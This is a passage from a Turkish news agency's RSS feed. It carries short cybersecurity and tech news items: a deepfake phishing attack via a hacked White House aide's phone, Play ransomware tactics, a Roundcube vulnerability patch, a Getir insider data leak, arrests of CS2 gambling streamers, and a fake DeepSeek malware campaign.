<guid>https://www.ajansexpres.com.tr/trump-doeneminin-ust-duzey-isminin-telefonu-ele-gecirildi-yapay-zeka-ile-personel-tuzaga-dusuruldu</guid>
<description><![CDATA[ Donald Trump&#039;ın personel müdürü Susie Wiles’a ait iPhone&#039;un siber saldırganlarca ele geçirildiği ve rehberdeki isimlere yapay zekâ ile ses ve görüntü taklidiyle oltalama mesajları gönderildiği ortaya çıktı. FBI olay sonrası devreye girdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894842a148ea.webp" length="24096" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:05 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Trump dönemindeki siber saldırının hedefi kimdi, saldırganlar hangi yöntemleri kullandı, FBI sürece nasıl müdahil oldu, yapay zekâ siber saldırılarda nasıl kullanılıyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="393" data-end="396"><strong data-start="396" data-end="462">Beyaz Saray’da güvenlik açığı siber saldırganlara fırsat verdi</strong><br data-start="462" data-end="465">Donald Trump döneminde personel müdürlüğü görevinde bulunan Susie Wiles’a ait kişisel iPhone cihazı, siber saldırganlar tarafından ele geçirildi. FBI tarafından yapılan açıklamaya göre, saldırganlar cihaza erişim sağladıktan sonra rehberdeki numaralara ulaştı. Rehberde Beyaz Saray personeli ve bazı tanınmış kişilerin iletişim bilgilerinin de bulunduğu belirtildi.</p>
<p></p>
<p data-start="834" data-end="1211"><strong data-start="834" data-end="885">Yapay zekâ ile sahte ses ve yüz taklidi yapıldı</strong><br data-start="885" data-end="888">Saldırganlar, Wiles’ın sesini ve yüzünü yapay zekâ teknolojileriyle taklit ederek rehberdeki kişilere mesajlar göndermeye başladı. Mesaj içeriklerinde, hedeflenen kişileri sohbet etmeye ikna etme ve Telegram uygulamasına yönlendirme girişimleri tespit edildi. Bu yöntemle oltalama saldırısı gerçekleştirildiği bildirildi.</p>
<p data-start="1213" data-end="1522"><strong data-start="1213" data-end="1253">FBI müdahale etti, güvenlik sağlandı</strong><br data-start="1253" data-end="1256">Söz konusu mesajların ardından personelin şüphelenerek durumu fark etmesi üzerine olay Federal Soruşturma Bürosu’na (FBI) bildirildi. FBI, soruşturmayı başlattığını ve hem Susie Wiles’ın telefonu hem de diğer personel cihazlarında güvenliğin sağlandığını açıkladı.</p>
<p data-start="1524" data-end="1782"><strong data-start="1524" data-end="1569">Daha önce de siber saldırı hedefi olmuştu</strong><br data-start="1569" data-end="1572">Henüz iPhone cihazının tam olarak nasıl ele geçirildiği bilinmiyor. Ancak daha önce, 2023 yılında İranlı siber saldırganlar tarafından Wiles’ın kişisel e-posta hesabının da ele geçirildiği bilgisi paylaşıldı.</p>
<p data-start="1784" data-end="1971"><strong data-start="1784" data-end="1796"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Play Fidye Yazılım Grubu Alarm Veriyor: Her Saldırıya Özel Virüs, Telefonla Tehdit, VMware&amp;apos;lere Özel Şifreleme!</title>
<link>https://www.ajansexpres.com.tr/play-fidye-yazilim-grubu-alarm-veriyor-her-saldiriya-ozel-virus-telefonla-tehdit-vmwarelere-ozel-sifreleme</link>
<guid>https://www.ajansexpres.com.tr/play-fidye-yazilim-grubu-alarm-veriyor-her-saldiriya-ozel-virus-telefonla-tehdit-vmwarelere-ozel-sifreleme</guid>
<description><![CDATA[ CISA&#039;nın 4 Haziran 2025 tarihli raporuna göre, Play fidye yazılım grubu 2024&#039;ün en aktif siber tehditlerinden biri haline geldi. 900’e yakın kurumu hedef alan grup, yeni açıklanan bir güvenlik açığını kullanarak sistemlere sızıyor ve artık doğrudan kurbanları arayarak tehdit ediyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484254acf4.webp" length="51018" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:47:01 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Play grubu hangi güvenlik açığını kullanıyor, VMware sistemlerde nasıl bir saldırı yöntemi izleniyor, GRIXBA nedir ve ne işe yarıyor, kurbanlara telefonla nasıl tehditlerde bulunuluyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="451" data-end="786"><strong data-start="451" data-end="487">Play Grubu 900 Kurumu Hedef Aldı</strong><br data-start="487" data-end="490">ABD Federal Soruşturma Bürosu (FBI) verilerine göre Play fidye yazılım grubu, bugüne kadar yaklaşık 900 kurumu hedef aldı. Grup, yalnızca saldırı sayısını artırmakla kalmadı, aynı zamanda saldırı tekniklerini de çeşitlendirdi. 2025 Mayıs itibarıyla aktif saldırılar gerçekleştirmeye devam ediyor.</p>
<p data-start="788" data-end="1131"><strong data-start="788" data-end="830">Yeni Saldırı Yöntemi: SimpleHelp Açığı</strong><br data-start="830" data-end="833">CVE-2024-57727 kodlu güvenlik açığı 16 Ocak 2025'te kamuoyuna duyuruldu. Play grubu ve ona bağlı tehdit aktörleri, bu zafiyeti hızla istismar etmeye başladı. SimpleHelp isimli uzak masaüstü erişim aracı üzerinden sistemlere sızan grup, bu yazılımı kullanan kuruluşlara güncelleme çağrısı yapılıyor.</p>
<p data-start="1133" data-end="1432"><strong data-start="1133" data-end="1168">Her Kurbana Özel Fidye Yazılımı</strong><br data-start="1168" data-end="1171">Play grubu, tespit edilmemek için fidye yazılımı dosyalarını her saldırı için yeniden derliyor. Bu da her kurban için benzersiz bir virüs oluşmasına yol açıyor. Antivirüs yazılımları için tespiti zorlaştıran bu yöntem, grubun teknik kapasitesini ortaya koyuyor.</p>
<p data-start="1434" data-end="1782"><strong data-start="1434" data-end="1473">Yeni Tehdit Türü: Telefonla Gözdağı</strong><br data-start="1473" data-end="1476">Grup yalnızca e-posta ile değil, artık doğrudan kurbanları telefonla arayarak tehdit ediyor. Kurumların farklı birimlerine ait numaralara ulaşarak, 'verilerinizi sızdırırız' şeklinde baskı kuruyorlar. Her kurban için özel olarak oluşturulan "@gmx.de" veya "@web.de" uzantılı e-posta adresleri kullanılıyor.</p>
<p data-start="1784" data-end="2096"><strong data-start="1784" data-end="1817">VMware Sistemler Özel Hedefte</strong><br data-start="1817" data-end="1820">Play grubu, VMware ESXi hipervizör sistemleri için özel olarak tasarlanmış bir fidye yazılımı geliştirdi. Sanal makineleri kapatıp, sanal makine dosyalarını AES-256 şifreleme ile kilitliyor. Aynı zamanda sistem arayüzündeki karşılama mesajını da fidye notuyla değiştiriyorlar.</p>
<p data-start="2098" data-end="2343"><strong data-start="2098" data-end="2133">Kendi Casus Yazılımları: GRIXBA</strong><br data-start="2133" data-end="2136">GRIXBA isimli bilgi hırsızlığı yazılımı, grubun geliştirdiği özel bir casus araç. Bu yazılım, ağ yapılarını tarıyor, antivirüs yazılımlarını tespit ediyor ve Zabbix 2023 kimliği altında gizlenmeye çalışıyor.</p>
<p data-start="2345" data-end="2450"><strong data-start="2345" data-end="2369">Kurumlar Ne Yapmalı?</strong><br data-start="2369" data-end="2372">CISA’nın önerilerine göre, alınması gereken önlemler şu şekilde sıralanıyor:</p>
<ol data-start="2451" data-end="2715">
<li data-start="2451" data-end="2497">
<p data-start="2454" data-end="2497">CVE-2024-57727 yamasını derhal uygulayın.</p>
</li>
<li data-start="2498" data-end="2587">
<p data-start="2501" data-end="2587">Özellikle VPN ve e-posta sistemlerinde çok faktörlü kimlik doğrulamayı devreye alın.</p>
</li>
<li data-start="2588" data-end="2629">
<p data-start="2591" data-end="2629">Ağ segmentasyonunuzu gözden geçirin.</p>
</li>
<li data-start="2630" data-end="2673">
<p data-start="2633" data-end="2673">Çevrimdışı yedeklerinizi kontrol edin.</p>
</li>
<li data-start="2674" data-end="2715">
<p data-start="2677" data-end="2715">Olay müdahale planınızı güncelleyin.</p>
</li>
</ol>
<p data-start="2717" data-end="2940">Play grubu artık sadece bir fidye yazılım grubu değil, organize bir siber suç ağı halini aldı. Hızlı teknik adaptasyonları, yeni açıkları hızla kullanmaları ve psikolojik baskı yöntemleriyle ciddi bir tehdit oluşturuyorlar.</p>
<p data-start="2942" data-end="3143"><strong data-start="2942" data-end="2954"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Roundcube&amp;apos;da Uzaktan Kod Çalıştırma Açığı Tespit Edildi: Plesk Hızla Güncelleme Yayınladı</title>
<link>https://www.ajansexpres.com.tr/roundcubeda-uzaktan-kod-calistirma-acigi-tespit-edildi-plesk-hizla-guncelleme-yayinladi</link>
<guid>https://www.ajansexpres.com.tr/roundcubeda-uzaktan-kod-calistirma-acigi-tespit-edildi-plesk-hizla-guncelleme-yayinladi</guid>
<description><![CDATA[ Roundcube Webmail sisteminde tespit edilen kritik güvenlik açığı (CVE-2025-49113) sonrası, Plesk 5 Haziran&#039;da güncelleme yayınladı. Uzaktan kod çalıştırmaya neden olabilecek bu açık, milyonlarca sunucuyu etkileyebilir. Güncelleme yapılması önemle tavsiye ediliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894841fd85c1.webp" length="50206" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:55 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Roundcube güvenlik açığı nedir, Plesk hangi sürümlerde güncelleme yaptı, güncelleme almayan sunucular ne yapmalı, Plesk yaşam döngüsü politikası nedir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="394" data-end="397"><strong data-start="397" data-end="449">Roundcube'da kritik güvenlik açığı tespit edildi</strong><br data-start="449" data-end="452">Roundcube Webmail'in 1.5.10 öncesi ve 1.6.x serisinin 1.6.11 öncesi sürümlerinde, uzaktan kod çalıştırmaya olanak tanıyan kritik bir güvenlik açığı keşfedildi. Güvenlik açığı, CVE-2025-49113 koduyla kayda geçti.</p>
<p></p>
<p data-start="665" data-end="1017"><strong data-start="665" data-end="696">Plesk hızlıca müdahale etti</strong><br data-start="696" data-end="699">Bu açığın kamuoyuna duyurulmasının ardından Plesk, 5 Haziran tarihinde güncelleme yayımlayarak güvenlik zafiyetini giderdi. Güncellemenin, Plesk paneline sahip sunuculara otomatik olarak ulaşması bekleniyor. Ancak kullanıcıların kendi sistemlerinde güncellemenin yüklü olduğundan emin olmaları önemle tavsiye ediliyor.</p>
<p data-start="1019" data-end="1163"><strong data-start="1019" data-end="1079">Hangi sürümler etkileniyor, hangi güncellemeler gerekli?</strong><br data-start="1079" data-end="1082">Plesk yetkilileri, güvenlik açığının giderildiği güncellemeleri şöyle sıraladı:</p>
<ul data-start="1164" data-end="1235">
<li data-start="1164" data-end="1199">
<p data-start="1166" data-end="1199">Plesk Obsidian 18.0.70 Update 1</p>
</li>
<li data-start="1200" data-end="1235">
<p data-start="1202" data-end="1235">Plesk Obsidian 18.0.69 Update 4</p>
</li>
</ul>
<p data-start="1237" data-end="1328">Sistemi bu sürümlerden daha eski olan kullanıcıların derhal güncelleme yapmaları gerekiyor.</p>
<p data-start="1330" data-end="1597"><strong data-start="1330" data-end="1373">Alternatif çözüm: Sunucular arası geçiş</strong><br data-start="1373" data-end="1376">Güncellemeyi doğrudan alamayan kullanıcılar için Plesk, sunucular arası geçiş (server-to-server migration) seçeneğini öneriyor. Böylelikle daha güncel bir Plesk sürümüne geçilerek güvenlik açıklarının önüne geçilebiliyor.</p>
<p data-start="1599" data-end="1853"><strong data-start="1599" data-end="1659">Plesk yaşam döngüsü politikası göz önünde bulundurulmalı</strong><br data-start="1659" data-end="1662">Güncelleme desteği bulunmayan eski sürümler için kullanıcıların Plesk'in yaşam döngüsü (Lifecycle Policy) kurallarını incelemeleri ve uzun vadeli çözümler geliştirmeleri gerektiği vurgulandı.</p>
<p data-start="1855" data-end="2018"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Medium Yazarı Enes Uyardı: Türkiye’deki Kritik Kurumlarda İsrail Menşeli Yazılımlar Kullanılıyor</title>
<link>https://www.ajansexpres.com.tr/medium-yazari-enes-uyardi-turkiyedeki-kritik-kurumlarda-israil-menseli-yazilimlar-kullaniliyor</link>
<guid>https://www.ajansexpres.com.tr/medium-yazari-enes-uyardi-turkiyedeki-kritik-kurumlarda-israil-menseli-yazilimlar-kullaniliyor</guid>
<description><![CDATA[ Medium platformunda yazdığı dikkat çekici analizde Enes adlı kullanıcı, Türkiye’de kamu ve özel sektör tarafından kullanılan İsrail merkezli siber güvenlik yazılımlarının ciddi güvenlik riskleri taşıdığını vurguladı. Yazıda, bu şirketlerin yöneticilerinin İsrail ordusu ve istihbarat geçmişine dikkat çekildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894841a4975a.webp" length="14920" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Medium yazarı Enes hangi güvenlik risklerine dikkat çekti, Türkiyede hangi İsrail menşeli yazılımlar kullanılıyor, bu şirketlerin yöneticilerinin geçmişi neden önemli, kamu kurumları bu yazılımlardan neden vazgeçmeli</media:keywords>
<content:encoded><![CDATA[<p><br data-start="458" data-end="461"><strong data-start="461" data-end="518">Medium yazarı Enes’ten çarpıcı siber güvenlik analizi</strong><br data-start="518" data-end="521">Medium platformunda yayınladığı bir yazıyla dikkat çeken Enes adlı kullanıcı, Türkiye’de kamu ve özel sektör kuruluşlarında kullanılan İsrail menşeli siber güvenlik yazılımlarına dair ciddi uyarılarda bulundu. Enes’in aktardığına göre bu yazılımlar, sadece ekonomik değil, aynı zamanda ulusal güvenlik açısından da riskler barındırıyor.</p>
<p></p>
<p data-start="859" data-end="1267"><strong data-start="859" data-end="904">İsrail’in siber güvenlikteki rolü büyüyor</strong><br data-start="904" data-end="907">İsrail, siber güvenlik ve bilişim altyapıları konusunda dünyada önde gelen ülkeler arasında yer alıyor. Ülke, devlet destekli projeler ve Silikon Vadisi’ndeki Yahudi lobisinin etkisiyle global pazarda büyük bir pay elde etmiş durumda. Enes, bu altyapının arkasında sıklıkla İsrail ordusu ve istihbarat kurumlarında görev almış kişilerin bulunduğunu vurguluyor.</p>
<p data-start="1269" data-end="1417"><strong data-start="1269" data-end="1311">Türkiye’de hangi ürünler kullanılıyor?</strong><br data-start="1311" data-end="1314">Yazıda, Türkiye'de kullanılan ve İsrail merkezli dört ana şirketin ürünleri detaylı olarak inceleniyor:</p>
<ul data-start="1419" data-end="2257">
<li data-start="1419" data-end="1633">
<p data-start="1421" data-end="1633"><strong data-start="1421" data-end="1463">CheckPoint Software Technologies Ltd.:</strong> Tel Aviv merkezli şirket, siber güvenlik duvarları ve VPN hizmetleri sunuyor. Enes, şirketin birçok yöneticisinin İsrail devletiyle doğrudan ilişkili olduğunu aktarıyor.</p>
</li>
<li data-start="1635" data-end="1862">
<p data-start="1637" data-end="1862"><strong data-start="1637" data-end="1651">CheckMarx:</strong> Yazılım kodlarının güvenlik analizini yapan bu şirketin ürünleri Türkiye’de de yazılım geliştirme süreçlerinde kullanılıyor. Şirketin CTO’su Maty Siman’ın İsrail Başbakanlığı ve IDF geçmişi olduğu belirtiliyor.</p>
</li>
<li data-start="1864" data-end="2041">
<p data-start="1866" data-end="2041"><strong data-start="1866" data-end="1893">CyberArk Software Ltd.:</strong> Kimlik ve erişim yönetimi ürünleri sunan bu şirketin yöneticilerinin büyük kısmı İsrail Silahlı Kuvvetleri ve istihbarat birimlerinde görev yapmış.</p>
</li>
<li data-start="2043" data-end="2257">
<p data-start="2045" data-end="2257"><strong data-start="2045" data-end="2055">JFrog:</strong> CI/CD süreçlerinde kullanılan yazılım dağıtım platformu JFrog’un da yöneticilerinin çoğu İsrail kökenli. Binary yönetimi ve güvenlik taramaları sağlayan ürünleri Türkiye'de yaygın biçimde kullanılıyor.</p>
</li>
</ul>
<p data-start="2259" data-end="2618"><strong data-start="2259" data-end="2302">Veri güvenliği ve bağımlılık eleştirisi</strong><br data-start="2302" data-end="2305">Enes, yazısında bu yazılımlar üzerinden ülke dışına sızabilecek verilerin, Türkiye’nin stratejik bilgilerini tehlikeye atabileceğini öne sürüyor. Yazılım ve bilişim sektöründe alternatif ürünler geliştirilmesi gerektiğini savunuyor ve kamu kurumlarının bu konuda daha bilinçli hareket etmesi çağrısında bulunuyor.</p>
<p data-start="2620" data-end="2877"><strong data-start="2620" data-end="2645">Bilgi kaynakları açık</strong><br data-start="2645" data-end="2648">Yazıda yer alan tüm yönetici bilgileri ve şirket açıklamaları, doğrudan ilgili firmaların resmi internet sitelerinde yayımlanan açık kaynak bilgilerden derlenmiş durumda. Enes, bu bilgileri okuyucularla şeffaf biçimde paylaşıyor.</p>
<p data-start="2879" data-end="3113"><strong data-start="2879" data-end="2891"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>CS2 yayınlarına kumar baskını: 10 fenomen gözaltına alındı, Key Drop’a erişim engeli geldi</title>
<link>https://www.ajansexpres.com.tr/cs2-yayinlarina-kumar-baskini-10-fenomen-goezaltina-alindi-key-dropa-erisim-engeli-geldi</link>
<guid>https://www.ajansexpres.com.tr/cs2-yayinlarina-kumar-baskini-10-fenomen-goezaltina-alindi-key-dropa-erisim-engeli-geldi</guid>
<description><![CDATA[ Counter-Strike 2&#039;de sanal kasa açan yayıncılar, “kumar oynamaya teşvik” suçlamasıyla gözaltına alındı. Milyon takipçili fenomenlerin dahil olduğu operasyonda Key Drop sitesine de erişim engeli getirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894841729dcf.webp" length="9178" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:47 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CS2 kasa açan yayıncılar kimler, Key Drop neden kapatıldı, kaç kişi gözaltına alındı, soruşturmayı hangi savcılık yürütüyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="350" data-end="353"><strong data-start="353" data-end="386">CS2 kasaları yeniden gündemde</strong><br data-start="386" data-end="389">Valve’in popüler çevrim içi oyunu Counter-Strike 2 (CS2) içindeki sanal kasa sistemi, Türkiye’de “kumar” tartışmalarının odağı haline geldi. Oyuncuların rastgele oyun içi ürünler kazanabildiği bu kasaların bazı eşyaları 1 liradan başlayıp on binlerce liraya kadar değer kazanabiliyor.</p>
<p></p>
<p data-start="677" data-end="1020"><strong data-start="677" data-end="720">Key Drop yayınları mercek altına alındı</strong><br data-start="720" data-end="723">Sanal kasa açma sistemini farklı şekilde sunan Key Drop adlı internet sitesi, Türkiye’deki pek çok yayıncıyla iş birliği içerisinde çalışıyor. Site üzerinden yayın yapan ve kasalardan yüksek değerli eşyalar kazanma umuduyla içerik üreten yayıncılar, yasa dışı bahis kapsamında incelemeye alındı.</p>
<p data-start="1022" data-end="1377"><strong data-start="1022" data-end="1053">10 yayıncı gözaltına alındı</strong><br data-start="1053" data-end="1056">İstanbul Cumhuriyet Başsavcılığı Bilişim Suçları Soruşturma Bürosu tarafından yürütülen soruşturma çerçevesinde, Siber Suçlarla Mücadele ekipleri Twitch, YouTube, TikTok ve Instagram gibi platformlardaki Key Drop yayınlarını inceledi. Operasyon kapsamında 19 şüpheli hakkında işlem başlatıldı; 10 kişi gözaltına alındı.</p>
<p data-start="1379" data-end="1704"><strong data-start="1379" data-end="1421">Gözaltına alınan fenomenler belli oldu</strong><br data-start="1421" data-end="1424">Demirören Haber Ajansı’nın (DHA) aktardığı bilgiye göre gözaltına alınan fenomen yayıncılar arasında Kemal Can Parlak, Ferit Karakaya, Necati Akçay, Tolunay Ören, Ferhat Can Dama, Ömer Faruk Karataş, Mert Kancefer, Furkan Burak Bayrak, Duru Batır ve Eray Can Özkenar yer alıyor.</p>
<p data-start="1706" data-end="1957"><strong data-start="1706" data-end="1738">Key-drop.com’a erişim engeli</strong><br data-start="1738" data-end="1741">Ankara 12. Sulh Ceza Hakimliği’nin 08 Mayıs 2025 tarihli kararıyla Key Drop internet sitesine Türkiye’den erişim engeli getirildi. Site, yasa dışı bahis ve kumar faaliyetlerine teşvik ettiği gerekçesiyle kapatıldı.</p>
<p data-start="1959" data-end="2158"><strong data-start="1959" data-end="1988">Diğer şüpheliler aranıyor</strong><br data-start="1988" data-end="1991">Yetkililer, 5 şüphelinin yurtdışında, 2 kişinin şehir dışında olduğunu, 1 kişinin ise firari durumda olduğunu açıkladı. 1 şüphelinin ise adliyeye gelmesi bekleniyor.</p>
<p data-start="2160" data-end="2302"><strong data-start="2160" data-end="2172"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Getir ve BiTaksi kullanıcılarına ait veriler karanlık ağda satışa sunuldu: Şirkete içeriden sızıldı</title>
<link>https://www.ajansexpres.com.tr/getir-ve-bitaksi-kullanicilarina-ait-veriler-karanlik-agda-satisa-sunuldu-sirkete-iceriden-sizildi</link>
<guid>https://www.ajansexpres.com.tr/getir-ve-bitaksi-kullanicilarina-ait-veriler-karanlik-agda-satisa-sunuldu-sirkete-iceriden-sizildi</guid>
<description><![CDATA[ Getir ve BiTaksi sistemlerine içeriden erişim sağlanarak binlerce kullanıcıya ait kişisel verilerin çalındığı ortaya çıktı. Kurumsal e-posta hesabıyla veri çeken yazılımcının, şirket kurucusuna şantaj yaptığı iddiasıyla 13 yıla kadar hapsi istendi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948412163ab.webp" length="45012" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:42 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Getir ve BiTaksi kullanıcı verileri nasıl sızdırıldı, şüpheli çalışanın sistemdeki rolü neydi, hangi bilgiler karanlık ağda paylaşıldı, şüpheli hakkında kaç yıl hapis isteniyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="404" data-end="407"><strong data-start="407" data-end="477">İstanbul Cumhuriyet Başsavcılığı Bilişim Suçları Soruşturma Bürosu</strong>, Getir ve BiTaksi platformlarına yönelik geniş kapsamlı bir soruşturma başlattı. Yapılan açıklamaya göre, her iki platformun sistemine izinsiz şekilde erişilerek kullanıcıların kişisel verileri ele geçirildi.</p>
<p></p>
<p data-start="690" data-end="964">Soruşturma dosyasına giren bilgilere göre, Getir'de yazılım mühendisi olarak çalışan Ferhat Y., sadece 20 gün içinde 2 bin 890 kullanıcıya ait isim, soy isim, adres, telefon, e-posta, seyahat ve sipariş bilgilerini sistemden çekerek sosyal medya ve karanlık ağda paylaştı.</p>
<p data-start="966" data-end="1282"><strong data-start="966" data-end="1013">Şirket kurucusuna şantaj mesajları gönderdi</strong><br data-start="1013" data-end="1016">İddialara göre Ferhat Y., elde ettiği milyonlarca satırlık veriyi Getir ve BiTaksi'nin kurucusu Nazım Salur'a e-posta yoluyla tehdit amaçlı gönderdi. 'Nazım Bey' takma adıyla gönderilen mesajlarda verilerin üçüncü şahıslara ya da medyaya satılabileceği ima edildi.</p>
<p data-start="1284" data-end="1571"><strong data-start="1284" data-end="1337">Veri sorgulamaları ve dijital izler tespit edildi</strong><br data-start="1337" data-end="1340">Yapılan teknik analizde, Ferhat Y.'nin ferhat.y***@getir.com** uzantılı kurumsal hesabından 23 Şubat – 11 Mart 2023 tarihleri arasında çok sayıda veri sorgusu yaptığı ve her sorguda 2 binin üzerinde satır veri çektiği belirlendi.</p>
<p data-start="1573" data-end="1770">Savcılık, şüpheli hakkında TCK 244 (bilişim sistemine girme), TCK 136 (kişisel verileri hukuka aykırı elde etme) ve TCK 107 (şantaj) suçlamalarıyla 5 yıldan 13 yıla kadar hapis cezası talep etti.</p>
<p data-start="1772" data-end="2099"><strong data-start="1772" data-end="1817">Siber güvenlik önlemleri yeniden gündemde</strong><br data-start="1817" data-end="1820">Türkiye’nin en yaygın dijital servislerinden olan Getir ve BiTaksi’ye yönelik bu sızıntı, içeriden gelen tehditlerin ciddiyetini bir kez daha gündeme taşıdı. Uzmanlar, şirketlerin iç tehditlere karşı siber güvenlik protokollerini yeniden değerlendirmesi gerektiğini vurguluyor.</p>
<p data-start="2101" data-end="2296"><strong data-start="2101" data-end="2113"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Uzmanlardan kritik uyarı: &amp;apos;DeepSeek&amp;apos; görünümüyle bilgisayarlara gizlice giriyorlar</title>
<link>https://www.ajansexpres.com.tr/uzmanlardan-kritik-uyari-deepseek-goerunumuyle-bilgisayarlara-gizlice-giriyorlar</link>
<guid>https://www.ajansexpres.com.tr/uzmanlardan-kritik-uyari-deepseek-goerunumuyle-bilgisayarlara-gizlice-giriyorlar</guid>
<description><![CDATA[ Kaspersky uzmanları, &#039;DeepSeek R1&#039; adıyla yayılan sahte yazılımlar konusunda kullanıcıları uyardı. Sahte web siteleri ve Google reklamları üzerinden yayılan zararlı yazılım, hassas verileri ele geçirmeyi hedefliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894840d95d8d.webp" length="14850" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:37 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>sahte DeepSeek nasıl yayılıyor, BrowserVenom zararlı yazılım nedir, DeepSeek saldırısından nasıl korunulur, zararlı yazılımın hedefinde kimler var</media:keywords>
<content:encoded><![CDATA[<p><br>Kaspersky Global Araştırma ve Analiz Ekibi (GReAT), sahte 'DeepSeek R1 Büyük Dil Modeli' (LLM) uygulaması kullanılarak bilgisayarlara sızan yeni bir kötü amaçlı yazılım kampanyasını ortaya çıkardı.</p>
<p></p>
<p data-start="534" data-end="583"><strong data-start="534" data-end="583">Google Reklamlarıyla Sahte Siteye Yönlendirme</strong></p>
<p data-start="585" data-end="803">Saldırganlar, Google reklamları üzerinden kullanıcıları gerçek DeepSeek platformunu taklit eden sahte sitelere çekiyor. Kullanıcılar "deepseek r1" araması yaptığında, reklam bağlantısı tuzak bir siteye yönlendiriliyor.</p>
<p data-start="805" data-end="855"><strong data-start="805" data-end="855">Sahte Uygulamalar ve Truva Atları Kullanılıyor</strong></p>
<p data-start="857" data-end="1147">Sahte site, Windows işletim sistemi kullanıcılarını hedef alıyor ve kullanıcıya çevrim dışı çalışan Ollama veya LM Studio gibi araçları indirme imkanı sunuyor. İndirme işlemi sırasında CAPTCHA testi kullanılarak kullanıcı kandırılıyor ve ardından kötü amaçlı yazılım bilgisayara yükleniyor.</p>
<p data-start="1149" data-end="1190"><strong data-start="1149" data-end="1190">Windows Defender Koruması Atlatılıyor</strong></p>
<p data-start="1192" data-end="1443">Bu yazılım, Windows Defender'ın korumasını özel algoritmalarla aşarak sisteme yerleşiyor. Ancak yükleme, kullanıcının yönetici haklarına sahip olmasını gerektiriyor. Yönetici hakkı bulunmayan kullanıcıların sistemlerine bu zararlı yazılım bulaşamıyor.</p>
<p data-start="1445" data-end="1483"><strong data-start="1445" data-end="1483">Kullanıcı Verileri Tehlike Altında</strong></p>
<p data-start="1485" data-end="1745">'BrowserVenom' olarak adlandırılan zararlı yazılım, kullanıcının internet tarayıcılarını saldırganlar tarafından kontrol edilen bir proxy sunucusuna yönlendiriyor. Bu yöntemle kullanıcıların hassas tarayıcı verileri çalınıyor ve faaliyetleri sürekli izleniyor.</p>
<p data-start="1747" data-end="1789"><strong data-start="1747" data-end="1789">Uzmanlardan Siber Güvenlik Tavsiyeleri</strong></p>
<p data-start="1791" data-end="1866">Kaspersky uzmanları, kullanıcılara aşağıdaki önlemleri almalarını öneriyor:</p>
<ul data-start="1867" data-end="2120">
<li data-start="1867" data-end="1924">
<p data-start="1869" data-end="1924">İnternet sitesi adreslerinin doğruluğunu kontrol etmek,</p>
</li>
<li data-start="1925" data-end="1998">
<p data-start="1927" data-end="1998">Çevrim dışı yapay zeka araçlarını yalnızca resmi kaynaklardan indirmek,</p>
</li>
<li data-start="1999" data-end="2072">
<p data-start="2001" data-end="2072">Windows’u yönetici ayrıcalıklarına sahip olmayan profillerde kullanmak,</p>
</li>
<li data-start="2073" data-end="2120">
<p data-start="2075" data-end="2120">Güvenilir siber güvenlik çözümleri kullanmak.</p>
</li>
</ul>
<p data-start="2122" data-end="2357">Kaspersky Güvenlik Araştırmacısı Lisandro Ubiedo, yapay zeka uygulamalarının çevrim dışı kullanımının avantajlarına dikkat çekerken, doğru önlemler alınmadığında bu tür kötü amaçlı yazılımların ciddi tehdit oluşturabileceğini belirtti.</p>
<p data-start="2359" data-end="2516"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>SS7 açığı karaborsada 5 bin dolara satılıyor: Siber tehdit aktörünün iletişimi adım adım ifşa edildi</title>
<link>https://www.ajansexpres.com.tr/ss7-acigi-karaborsada-5-bin-dolara-satiliyor-siber-tehdit-aktoerunun-iletisimi-adim-adim-ifsa-edildi</link>
<guid>https://www.ajansexpres.com.tr/ss7-acigi-karaborsada-5-bin-dolara-satiliyor-siber-tehdit-aktoerunun-iletisimi-adim-adim-ifsa-edildi</guid>
